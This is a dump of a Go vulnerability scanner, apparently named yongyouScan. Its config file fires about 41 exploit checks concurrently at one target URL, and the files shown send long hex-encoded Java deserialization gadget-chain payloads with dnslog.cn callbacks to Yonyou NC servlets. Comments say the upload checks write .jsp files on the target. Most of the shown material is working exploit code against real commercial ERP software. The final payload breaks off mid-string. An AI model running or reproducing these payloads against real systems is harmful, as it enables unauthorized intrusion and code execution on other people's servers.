| github.com/onsi/ginkgo/v2 v2.12.0 h1:UIVDowFPwpg6yMUpPjGkYvf06K3RAiJXUhCxEwQVHRI= 32 | github.com/onsi/ginkgo/v2 v2.12.0/go.mod h1:ZNEzXISYlqpb8S36iN71ifqLi3vVD1rVJGvWRCJOUpQ= 33 | github.com/onsi/gomega v1.27.10 h1:naR28SdDFlqrG6kScpT8VWpu1xWY5nJRCF3XaYyBjhI= 34 | github.com/onsi/gomega v1.27.10/go.mod h1:RsS8tutOdbdgzbPtzzATp12yT7kM5I5aElG3evPbQ0M= 35 | github.com/pmezard/go-difflib v1.0.0 h1:4DBwDE0NGyQoBHbLQYPwSUPoCMWR5BEzIk/f1lZbAQM= 36 | github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4= 37 | github.com/quic-go/qpack v0.4.0 h1:Cr9BXA1sQS2SmDUWjSofMPNKmvF6IiIfDRmgU0w1ZCo= 38 | github.com/quic-go/qpack v0.4.0/go.mod h1:UZVnYIfi5GRk+zI9UMaCPsmZ2xKJP7XBUvVyT1Knj9A= 39 | github.com/quic-go/qtls-go1-20 v0.4.1 h1:D33340mCNDAIKBqXuAvexTNMUByrYmFYVfKfDN5nfFs= 40 | github.com/quic-go/qtls-go1-20 v0.4.1/go.mod h1:X9Nh97ZL80Z+bX/gUXMbipO6OxdiDi58b/fMC9mAL+k= 41 | github.com/quic-go/quic-go v0.40.0 h1:GYd1iznlKm7dpHD7pOVpUvItgMPo/jrMgDWZhMCecqw= 42 | github.com/quic-go/quic-go v0.40.0/go.mod h1:PeN7kuVJ4xZbxSv/4OX6S1USOX8MJvydwpTx31vx60c= 43 | github.com/refraction-networking/utls v1.5.4 h1:9k6EO2b8TaOGsQ7Pl7p9w6PUhx18/ZCeT0WNTZ7Uw4o= 44 | github.com/refraction-networking/utls v1.5.4/go.mod h1:SPuDbBmgLGp8s+HLNc83FuavwZCFoMmExj+ltUHiHUw= 45 | github.com/stretchr/objx v0.1.0/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME= 46 | github.com/stretchr/testify v1.6.1/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg= 47 | github.com/stretchr/testify v1.8.4 h1:CcVxjf3Q8PM0mHUKJCdn+eZZtm5yQwehR5yeSVQQcUk= 48 | github.com/stretchr/testify v1.8.4/go.mod h1:sz/lmYIOXD/1dqDmKjjqLyZ2RngseejIcXlSw2iwfAo= 49 | github.com/xo/terminfo v0.0.0-20210125001918-ca9a967f8778 h1:QldyIu/L63oPpyvQmHgvgickp1Yw510KJOqX7H24mg8= 50 | github.com/xo/terminfo v0.0.0-20210125001918-ca9a967f8778/go.mod h1:2MuV+tbUrU1zIOPMxZ5EncGwgmMJsa+9ucAQZXxsObs= 51 | go.uber.org/mock v0.3.0 h1:3mUxI1No2/60yUYax92Pt8eNOEecx2D3lcXZh2NEZJo= 52 | go.uber.org/mock 
v0.3.0/go.mod h1:a6FSlNadKUHUa9IP5Vyt1zh4fC7uAwxMutEAscFbkZc= 53 | golang.org/x/crypto v0.12.0 h1:tFM/ta59kqch6LlvYnPa0yx5a83cL2nHflFhYKvv9Yk= 54 | golang.org/x/crypto v0.12.0/go.mod h1:NF0Gs7EO5K4qLn+Ylc+fih8BSTeIjAP05siRnAh98yw= 55 | golang.org/x/exp v0.0.0-20230817173708-d852ddb80c63 h1:m64FZMko/V45gv0bNmrNYoDEq8U5YUhetc9cBWKS1TQ= 56 | golang.org/x/exp v0.0.0-20230817173708-d852ddb80c63/go.mod h1:0v4NqG35kSWCMzLaMeX+IQrlSnVE/bqGSyC2cz/9Le8= 57 | golang.org/x/mod v0.12.0 h1:rmsUpXtvNzj340zd98LZ4KntptpfRHwpFOHG188oHXc= 58 | golang.org/x/mod v0.12.0/go.mod h1:iBbtSCu2XBx23ZKBPSOrRkjjQPZFPuis4dIYUhu/chs= 59 | golang.org/x/net v0.14.0 h1:BONx9s002vGdD9umnlX1Po8vOZmrgH34qlHcD1MfK14= 60 | golang.org/x/net v0.14.0/go.mod h1:PpSgVXXLK0OxS0F31C1/tv6XNguvCrnXIDrFMspZIUI= 61 | golang.org/x/sys v0.12.0 h1:CM0HF96J0hcLAwsHPJZjfdNzs0gftsLfgKt57wWHJ0o= 62 | golang.org/x/sys v0.12.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= 63 | golang.org/x/text v0.13.0 h1:ablQoSUd0tRdKxZewP80B+BaqeKJuVhuRxj/dkrun3k= 64 | golang.org/x/text v0.13.0/go.mod h1:TvPlkZtksWOMsz7fbANvkp4WM8x/WCo/om8BMLbz+aE= 65 | golang.org/x/tools v0.12.1-0.20230815132531-74c255bcf846 h1:Vve/L0v7CXXuxUmaMGIEK/dEeq7uiqb5qBgQrZzIE7E= 66 | golang.org/x/tools v0.12.1-0.20230815132531-74c255bcf846/go.mod h1:Sc0INKfu04TlqNoRA1hgpFZbhYXHPr4V5DzpSBTPqQM= 67 | google.golang.org/protobuf v1.28.0 h1:w43yiav+6bVFTBQFZX0r7ipe9JQ1QsbMgHwbBziscLw= 68 | google.golang.org/protobuf v1.28.0/go.mod h1:HV8QOd/L58Z+nl8r43ehVNZIU/HEI6OcFqwMG9pJV4I= 69 | gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= 70 | gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= 71 | gopkg.in/yaml.v3 v3.0.1 h1:fxVm/GzAzEWqLHuvctI91KS9hhNmmWOoWu0XTYJS7CA= 72 | gopkg.in/yaml.v3 v3.0.1/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= 73 | -------------------------------------------------------------------------------- 
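/pkg/config/config.go: --------------------------------------------------------------------------------
1 | package config
2 |
3 | import (
4 | "github.com/gookit/color"
5 | "sync"
6 | "yongyouScan/pkg/POC/ConfigurationNc"
7 | ERP_NC_MLBL "yongyouScan/pkg/POC/ERP-NC-MLBL"
8 | FileReceiveServlet_Deser "yongyouScan/pkg/POC/FileReceiveServlet-Deser"
9 | GRP_U8_Proxy_sqljin_xxe "yongyouScan/pkg/POC/GRP-U8-Proxy-sqljin-xxe"
10 | GRP_U8_U8AppProxy "yongyouScan/pkg/POC/GRP-U8-U8AppProxy"
11 | GRP_U8_UploadFileData "yongyouScan/pkg/POC/GRP-U8-UploadFileData"
12 | KSOA_ImageUpload "yongyouScan/pkg/POC/KSOA-ImageUpload"
13 | KSOA_sqljni "yongyouScan/pkg/POC/KSOA-sqljni"
14 | MessageServlet_Deser "yongyouScan/pkg/POC/MessageServlet-Deser"
15 | NC_BshServlet "yongyouScan/pkg/POC/NC-BshServlet"
16 | u8_MxServlet "yongyouScan/pkg/POC/NC-Cloud-MxServlet"
17 | NC_JiuQiClientReqDispatch "yongyouScan/pkg/POC/NC-JiuQiClientReqDispatch"
18 | NC_XbrlPersistenceServlet "yongyouScan/pkg/POC/NC-XbrlPersistenceServlet"
19 | NC6_5_UploadFile "yongyouScan/pkg/POC/NC6.5-UploadFile"
20 | NCCloud_FS_sqljni "yongyouScan/pkg/POC/NCCloud-FS-sqljni"
21 | T_CRM_sqljni "yongyouScan/pkg/POC/T-CRM-sqljni"
22 | T_DownloadProxy_catfile "yongyouScan/pkg/POC/T-DownloadProxy-catfile"
23 | T_RecoverPassword "yongyouScan/pkg/POC/T-RecoverPassword"
24 | T_Uploadfile "yongyouScan/pkg/POC/T-Uploadfile"
25 | U8_ActionHandlerServlet "yongyouScan/pkg/POC/U8-ActionHandlerServlet"
26 | U8_CacheInvokeServlet "yongyouScan/pkg/POC/U8-CacheInvokeServlet"
27 | U8_ClientRequestDispatch "yongyouScan/pkg/POC/U8-ClientRequestDispatch"
28 | u8_FileTransportServlet "yongyouScan/pkg/POC/U8-FileTransportServlet"
29 | U8_OA_getSessionList "yongyouScan/pkg/POC/U8-OA-getSessionList"
30 | U8_OA_test_sqjni "yongyouScan/pkg/POC/U8-OA-test-sqjni"
31 | U8_RegisterServlet "yongyouScan/pkg/POC/U8-RegisterServlet"
32 | U8_TaskTreeQuery "yongyouScan/pkg/POC/U8-TaskTreeQuery"
33 | Uapjs_JNDI "yongyouScan/pkg/POC/Uapjs-JNDI"
34 | UploadServlet_Deser "yongyouScan/pkg/POC/UploadServlet-Deser"
35 | accept_upload "yongyouScan/pkg/POC/accept-upload"
36 | files_Deser "yongyouScan/pkg/POC/files-Deser"
37 | fs_dlbypass "yongyouScan/pkg/POC/fs-dlbypass"
38 | fs_rzBypass "yongyouScan/pkg/POC/fs-rzBypass"
39 | monitorservlet_Desera "yongyouScan/pkg/POC/monitorservlet-Desera"
40 | u8_LoggingConfigServlet "yongyouScan/pkg/POC/u8-LoggingConfigServlet"
41 | u8_LoginServlet "yongyouScan/pkg/POC/u8-LoginServlet"
42 | u8_MonitorServlet "yongyouScan/pkg/POC/u8-MonitorServlet"
43 | u8_ServletCommander "yongyouScan/pkg/POC/u8-ServletCommander"
44 | u8_TableInputOperServlet "yongyouScan/pkg/POC/u8-TableInputOperServlet"
45 | uapws_acessBypass "yongyouScan/pkg/POC/uapws-acessBypass"
46 | uapws_wsdl_XXE "yongyouScan/pkg/POC/uapws-wsdl-XXE"
47 | )
48 |
49 | // WorkExp describes one scan job: the base URL of the target.
50 | type WorkExp struct {
51 | Url string
52 | }
53 |
54 | // pocs is every check YonYouScanRun fires, in the order the goroutines were
55 | // previously spelled out by hand. wg.Add uses len(pocs), so editing this list
56 | // can no longer desynchronise the WaitGroup: the old hard-coded wg.Add(41) had
57 | // to be kept in step manually, and a miscount either hangs wg.Wait forever or
58 | // panics on a negative counter.
59 | var pocs = []func(string){
60 | ERP_NC_MLBL.Run,
61 | NC_BshServlet.Run,
62 | NCCloud_FS_sqljni.Run,
63 | NC6_5_UploadFile.Run,
64 | NC_XbrlPersistenceServlet.Run,
65 | U8_OA_getSessionList.Run,
66 | U8_OA_test_sqjni.Run,
67 | GRP_U8_UploadFileData.Run,
68 | GRP_U8_Proxy_sqljin_xxe.Run,
69 | Uapjs_JNDI.Run,
70 | T_CRM_sqljni.Run,
71 | T_Uploadfile.Run,
72 | T_RecoverPassword.Run,
73 | GRP_U8_U8AppProxy.Run,
74 | uapws_acessBypass.Run,
75 | fs_rzBypass.Run,
76 | fs_dlbypass.Run,
77 | files_Deser.Run,
78 | T_DownloadProxy_catfile.Run,
79 | KSOA_ImageUpload.Run,
80 | accept_upload.Run,
81 | // https://github.com/wgpsec/YongYouNcTool/blob/main/src/main/java/toolPannel.java
82 | MessageServlet_Deser.Run,
83 | UploadServlet_Deser.Run,
84 | monitorservlet_Desera.Run,
85 | FileReceiveServlet_Deser.Run,
86 | // https://blog.csdn.net/qq_41904294/article/details/134908263
87 | u8_TableInputOperServlet.Run,
88 | u8_LoginServlet.Run,
89 | u8_FileTransportServlet.Run,
90 | U8_CacheInvokeServlet.Run,
91 | U8_ActionHandlerServlet.Run,
92 | u8_ServletCommander.Run,
93 | u8_MxServlet.Run,
94 | u8_MonitorServlet.Run,
95 | U8_ClientRequestDispatch.Run,
96 | U8_RegisterServlet.Run,
97 | u8_LoggingConfigServlet.Run,
98 | uapws_wsdl_XXE.Run,
99 | ConfigurationNc.Run,
100 | KSOA_sqljni.Run,
101 | NC_JiuQiClientReqDispatch.Run,
102 | U8_TaskTreeQuery.Run,
103 | }
104 |
105 | // YonYouScanRun runs every check in pocs concurrently against c.Url and returns
106 | // once all of them have finished. Each check prints its own verdict; nothing is
107 | // returned and no error is surfaced. The checks are not passive: the upload
108 | // checks visible in this repo (accept-upload, GRP-U8 U8AppProxy, GRP-U8
109 | // UploadFileData) try to write a .jsp file on the target, and the two *_Deser
110 | // checks visible here (UploadServlet, MessageServlet) send payloads that call
111 | // back to dnslog.cn, so a run leaves request-log and on-disk artifacts that the
112 | // target's owner can look for.
113 | func (c *WorkExp) YonYouScanRun() {
114 | // Author's note, kept: the upload checks are half-finished and need revisiting;
115 | // their original caveat was that even an unauthenticated upload may require a
116 | // Cookie header, so those results may be inaccurate.
117 | // color.Blue.Println("[+] 上传的检测可能是不准确的,因为即使是未授权,在请求包中也要包含Cookie")
118 | color.Blue.Println("[+] URl: " + c.Url)
119 | var wg sync.WaitGroup
120 | wg.Add(len(pocs))
121 | for _, run := range pocs {
122 | run := run // per-iteration copy; needed on toolchains before Go 1.22, harmless after
123 | go func() {
124 | defer wg.Done() // counts down on every exit path of the check
125 | run(c.Url)
126 | }()
127 | }
128 | wg.Wait()
129 | }
130 |
-------------------------------------------------------------------------------- /pkg/POC/UploadServlet-Deser/UploadServlet-Deser.go: --------------------------------------------------------------------------------
1 | package UploadServlet_Deser
2 |
3 | import (
4 | "encoding/hex"
5 | "fmt"
6 | "github.com/gookit/color"
7 | "github.com/imroc/req/v3"
8 | "time"
9 | "yongyouScan/pkg/dnslog"
10 | "yongyouScan/pkg/utils"
11 | )
12 |
13 | var (
14 | client = req.C().EnableForceHTTP1().EnableDumpEachRequest().SetTimeout(5 * time.Second)
15 | UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
16 | )
17 |
18 | func Run(url string) {
// NOTE(review): domain is not checked for "" — dnslog.GetDnslogUrl returns empty
// strings when dnslog.cn is unreachable — so the request below is still sent with
// no usable callback and the verdict is then always "absent".
19 | domain, session := dnslog.GetDnslogUrl()
// NOTE(review): no "/" before "servlet": with a base URL that has no trailing slash
// (the README example is "http://127.0.0.1") this yields ".../127.0.0.1servlet/...";
// the other checks in this repo prefix their path with "/".
20 | url = url + "servlet/~ic/nc.document.pub.fileSystem.servlet.UploadServlet"
21 | _, err := client.R().SetHeaders(map[string]string{ // Set multiple headers at once
22 | "User-Agent": UA,
23 | }).SetBody(fmt.Sprintf("{{unquote(\"%s\")}}",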
utils.InsertBackslashX(fmt.Sprintf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s74000071007E00077400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063633332322E%s71007E000871007E000E740004687474707078767200336F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E457874656E64656450726F70657274696573243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334302E%s71007E000871007E00147400046874747070787672003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334312E%s71007E000871007E001A7400046874747070787672002E6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E466C75656E744974657261626C6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636231372E%s71007E000871007E0020740004687474707078767200376F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4D617070656450726F706572747944657363726970746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623138782E%s71007E000871007E00267400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E44796E614265616E4D61704465636F7261746F72244D6170456E74727900000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623139782E%s71007E000871007E002C740004687474707078767200326F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4265616E496E74726F7370656374696F6E4461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFF
FF740012633370303932782E%s71007E000871007E003274000468747470707876720031636F6D2E6D6368616E67652E76322E633370302E696D706C2E506F6F6C4261636B656444617461536F757263654261736500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012633370303935782E%s71007E000871007E00387400046874747070787672002D636F6D2E6D6368616E67652E76322E633370302E746573742E416C776179734661696C44617461536F7572636500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000E616A772E%s71007E000871007E003E7400046874747070787672002A6F72672E6173706563746A2E7765617665722E746F6F6C732E63616368652E53696D706C65436163686500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062342E%s71007E000871007E0044740004687474707078767200176273682E436F6C6C656374696F6E4D616E61676572243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062352E%s71007E000871007E004A7400046874747070787672001A6273682E656E67696E652E427368536372697074456E67696E6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062362E%s71007E000871007E0050740004687474707078767200236273682E636F6C6C656374696F6E2E436F6C6C656374696F6E4974657261746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001867726F6F7679313730323331312E%s71007E000871007E0056740004687474707078767200356F72672E636F6465686175732E67726F6F76792E7265666C656374696F6E2E436C617373496E666F24436C617373496E666F53657400000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76793234782E%s71007E000871007E005C7400046874747070787672001267726F6F76792E6C616E672E5475706C653200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76
793234342E%s71007E000871007E0062740004687474707078767200246F72672E636F6465686175732E67726F6F76792E72756E74696D652E64676D243131373000000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F6265636C2E%s71007E000871007E006874000468747470707876720031636F6D2E73756E2E6F72672E6170616368652E6263656C2E696E7465726E616C2E7574696C2E436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A646B377532312E%s71007E000871007E006E7400046874747070787672002C636F6D2E73756E2E636F7262612E73652E696D706C2E6F72627574696C2E4F5242436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A5245387532302E%s71007E000871007E0074740004687474707078767200426A617661782E7377696E672E706C61662E6D6574616C2E4D6574616C46696C6543686F6F7365725549244469726563746F7279436F6D626F426F784D6F64656C243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400106C696E75782E%s71007E000871007E007A7400046874747070787672002173756E2E6177742E5831312E4177744772617068696373436F6E6669674461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001277696E646F77732E%s71007E000871007E00807400046874747070787672001B73756E2E6177742E77696E646F77732E57427574746F6E5065657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400166A61636B736F6E323130302E%s71007E000871007E00867400046874747070787672002C636F6D2E666173746572786D6C2E6A61636B736F6E2E6461746162696E642E6E6F64652E504F4A4F4E6F6465000000000000000000000078707878", hex.EncodeToString([]byte(domain)))))).Post(url) 24 | if err != nil { 25 | color.Red.Println("[-] 用友 NC UploadServlet反序列化漏洞不存在") 26 | return 27 | } 28 | if dnslog.GetDnslogRecord(session) { 29 | color.Green.Println("[+] 用友 NC UploadServlet反序列化漏洞存在 -> " + url) 30 | 
return 31 | } 32 | color.Red.Println("[-] 用友 NC UploadServlet反序列化漏洞不存在") 33 | } 34 | -------------------------------------------------------------------------------- /pkg/POC/MessageServlet-Deser/MessageServlet-Deser.go: -------------------------------------------------------------------------------- 1 | package MessageServlet_Deser 2 | 3 | import ( 4 | "encoding/hex" 5 | "fmt" 6 | "github.com/gookit/color" 7 | "github.com/imroc/req/v3" 8 | "time" 9 | "yongyouScan/pkg/dnslog" 10 | "yongyouScan/pkg/utils" 11 | ) 12 | 13 | //https://blog.csdn.net/qq_41904294/article/details/134430713 14 | 15 | var ( 16 | client = req.C().EnableForceHTTP1().EnableDumpEachRequest().SetTimeout(5 * time.Second) 17 | UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 18 | ) 19 | 20 | func Run(url string) { 21 | domain, session := dnslog.GetDnslogUrl() 22 | url = url + "service/monitorservlet" 23 | _, err := client.R().SetHeaders(map[string]string{ // Set multiple headers at once 24 | "User-Agent": UA, 25 | }).SetBody(fmt.Sprintf("{{unquote(\"%s\")}}", 
utils.InsertBackslashX(fmt.Sprintf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s74000071007E00077400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063633332322E%s71007E000871007E000E740004687474707078767200336F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E457874656E64656450726F70657274696573243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334302E%s71007E000871007E00147400046874747070787672003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334312E%s71007E000871007E001A7400046874747070787672002E6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E466C75656E744974657261626C6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636231372E%s71007E000871007E0020740004687474707078767200376F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4D617070656450726F706572747944657363726970746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623138782E%s71007E000871007E00267400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E44796E614265616E4D61704465636F7261746F72244D6170456E74727900000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623139782E%s71007E000871007E002C740004687474707078767200326F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4265616E496E74726F7370656374696F6E4461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFF
FF740012633370303932782E%s71007E000871007E003274000468747470707876720031636F6D2E6D6368616E67652E76322E633370302E696D706C2E506F6F6C4261636B656444617461536F757263654261736500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012633370303935782E%s71007E000871007E00387400046874747070787672002D636F6D2E6D6368616E67652E76322E633370302E746573742E416C776179734661696C44617461536F7572636500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000E616A772E%s71007E000871007E003E7400046874747070787672002A6F72672E6173706563746A2E7765617665722E746F6F6C732E63616368652E53696D706C65436163686500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062342E%s71007E000871007E0044740004687474707078767200176273682E436F6C6C656374696F6E4D616E61676572243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062352E%s71007E000871007E004A7400046874747070787672001A6273682E656E67696E652E427368536372697074456E67696E6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062362E%s71007E000871007E0050740004687474707078767200236273682E636F6C6C656374696F6E2E436F6C6C656374696F6E4974657261746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001867726F6F7679313730323331312E%s71007E000871007E0056740004687474707078767200356F72672E636F6465686175732E67726F6F76792E7265666C656374696F6E2E436C617373496E666F24436C617373496E666F53657400000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76793234782E%s71007E000871007E005C7400046874747070787672001267726F6F76792E6C616E672E5475706C653200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76
793234342E%s71007E000871007E0062740004687474707078767200246F72672E636F6465686175732E67726F6F76792E72756E74696D652E64676D243131373000000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F6265636C2E%s71007E000871007E006874000468747470707876720031636F6D2E73756E2E6F72672E6170616368652E6263656C2E696E7465726E616C2E7574696C2E436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A646B377532312E%s71007E000871007E006E7400046874747070787672002C636F6D2E73756E2E636F7262612E73652E696D706C2E6F72627574696C2E4F5242436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A5245387532302E%s71007E000871007E0074740004687474707078767200426A617661782E7377696E672E706C61662E6D6574616C2E4D6574616C46696C6543686F6F7365725549244469726563746F7279436F6D626F426F784D6F64656C243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400106C696E75782E%s71007E000871007E007A7400046874747070787672002173756E2E6177742E5831312E4177744772617068696373436F6E6669674461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001277696E646F77732E%s71007E000871007E00807400046874747070787672001B73756E2E6177742E77696E646F77732E57427574746F6E5065657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400166A61636B736F6E323130302E%s71007E000871007E00867400046874747070787672002C636F6D2E666173746572786D6C2E6A61636B736F6E2E6461746162696E642E6E6F64652E504F4A4F4E6F6465000000000000000000000078707878", hex.EncodeToString([]byte(domain)))))).Post(url) 26 | if err != nil { 27 | color.Red.Println("[-] 用友 NC MessageServlet反序列化漏洞不存在") 28 | return 29 | } 30 | if dnslog.GetDnslogRecord(session) { 31 | color.Green.Println("[+] 用友 NC MessageServlet反序列化漏洞存在 -> " + url) 32 | 
return 33 | } 34 | color.Red.Println("[-] 用友 NC MessageServlet反序列化漏洞不存在") 35 | } 36 | -------------------------------------------------------------------------------- /pkg/POC/files-Deser/files-Deser.go: -------------------------------------------------------------------------------- 1 | package files_Deser 2 | 3 | import ( 4 | "encoding/hex" 5 | "fmt" 6 | "github.com/gookit/color" 7 | "github.com/imroc/req/v3" 8 | "time" 9 | "yongyouScan/pkg/dnslog" 10 | "yongyouScan/pkg/utils" 11 | ) 12 | 13 | var ( 14 | client = req.C().EnableForceHTTP1().EnableDumpEachRequest().SetTimeout(5 * time.Second) 15 | UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 16 | ) 17 | 18 | func Run(url string) { 19 | domain, session := dnslog.GetDnslogUrl() 20 | url = url + "/servlet/~baseapp/nc.file.pub.imple.FileUploadServlet" 21 | _, err := client.R(). 22 | SetHeaders(map[string]string{ // Set multiple headers at once 23 | "User-Agent": UA, 24 | "Content-Length": "20434", 25 | "Content-Type": "application/x-www-form-urlencoded", 26 | }).SetBody(fmt.Sprintf("{{unquote(\"%s\")}}", 
utils.InsertBackslashX(fmt.Sprintf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s74000071007E00077400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063633332322E%s71007E000871007E000E740004687474707078767200336F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E457874656E64656450726F70657274696573243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334302E%s71007E000871007E00147400046874747070787672003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334312E%s71007E000871007E001A7400046874747070787672002E6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E466C75656E744974657261626C6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636231372E%s71007E000871007E0020740004687474707078767200376F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4D617070656450726F706572747944657363726970746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623138782E%s71007E000871007E00267400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E44796E614265616E4D61704465636F7261746F72244D6170456E74727900000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623139782E%s71007E000871007E002C740004687474707078767200326F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4265616E496E74726F7370656374696F6E4461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFF
